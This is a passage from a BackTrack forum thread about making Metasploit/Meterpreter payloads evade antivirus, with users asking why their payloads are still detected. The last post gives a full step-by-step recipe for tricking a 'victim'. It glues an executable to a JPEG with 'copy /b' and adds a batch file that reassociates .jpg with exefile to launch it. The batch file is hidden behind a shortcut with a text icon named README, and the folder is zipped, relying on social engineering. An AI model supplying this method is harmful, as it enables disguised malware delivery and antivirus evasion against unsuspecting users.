Results 1 to 10 of 10

Thread: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

Hybrid View

  1. #1
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    hi guys:
    premise:
    the network being a "thing" free, I came across a "compelling" read: (thanks)
    http://www.pentestgeek.com/2012/01/2...t-writing-asm/
    (I recommend visiting the address before watching my video)
    I wanted to test the "content" on MY bt5r1 doing a "" "video" "
    deserves & credits NOT GO TO ME!!....but for them!

    if you want to watch: http://vimeo.com/37071571

    ps:as always sorry for the quality && errors !

  2. #2
    Just burned his ISO
    Join Date
    Jan 2012
    Posts
    8

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    Great work but do you know why it is needed to write the
    .section '.text' rwx
    .entrypoint
    at the beggining of the asm file ? I just don't get it what that does

  3. #3
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    It makes the .Text segment of your file executable.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  4. #4
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    hi
    I state to be super-INexperienced, but reading around it seems to me that should:###allow the "section of area-code" to will be executable ###
    ........ take it with tongs
    bye

  5. #5
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    3

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    Hi Zimmaro,

    many thanks for your interesting post, i just tried it but still detected ( i have avria AV), any advise?

    thank you in advance ...

  6. #6
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    2

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    hello when I dialout with the av Meterpreter accuses microsoft -> win32/swort.a
    Anyone know how to spend it?

  7. #7
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    2

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    hello when I dialout with the av Meterpreter accuses microsoft -> win32/swort.a
    Anyone know how to spend it?

  8. #8
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    hi,
    ozoubi
    "Are totally unprepared" to give you a definite answer, surely there will be a way ... working on "different types of encoding" .. try doing a specific search, and make test!. (I tried with 2 most used in my circle of "friends") (I DO NOT USE ViruScan-site)
    try to "talk with the guys from the" "link posted" " & also in this forum there are people very, very helpful and prepared! (except me )

  9. #9
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    3

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    please just one more question..
    any idea how to merge the exe file with any other file format ( pdf,jpg,avi....)

    thank you in advance..

  10. #10
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

    hi
    Hello there should be several ways
    they are found on the net! from the various software "" binder "" or use" winrar-method".
    Also in SET if I remember correctly has some similar things that exploit some vulns
    I tried to use this!! worked on CMD.exe (Windows) OR with linux under Wine(copy in linux the file cmd.exe "version winxp" ):
    you need:
    1)a.exe
    2)a.jpg
    3)create a folder "photo" in desktop
    4)cut & paste 2files into folder
    5)open cmd.exe(windows)& goto dir of "photo"folder
    6)write " copy /b a.exe + a.jpg a1.jpg "
    7)open a test folder to have 3 files (a.exe a.jpg a1.jpg)
    8) delete a.exe & a.jpg
    9)open a new notepad & write: @echo off
    assoc .jpg=exefile
    start a1.jpg
    assoc .jpg=jpgfile
    10)save as HELLO.bat in photo folder
    11)create a shortcut of HELLO.bat
    12)change icon of shortcut(need "txt-icon")keydx> proprieties>link>change icon.....ok
    13)rename (shorcut)HELLO.bat in README (use fantasy with "social-engineering")
    14)zip the folder >photo.zip
    when victim open compres-folder(don't have .exe) and * play *README the process a1.jpg( ) start.......
    bye

Similar Threads

  1. back track 5 "recovery mode" yes video, back track 5 "normal mode" no video
    By satelitetv in forum BackTrack 5 Beginners Section
    Replies: 0
    Last Post: 06-16-2011, 08:23 PM
  2. Replies: 4
    Last Post: 02-24-2011, 04:52 PM
  3. Replies: 3
    Last Post: 02-01-2011, 02:27 PM
  4. Replies: 246
    Last Post: 01-04-2010, 06:11 PM
  5. Replies: 0
    Last Post: 08-14-2007, 03:17 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •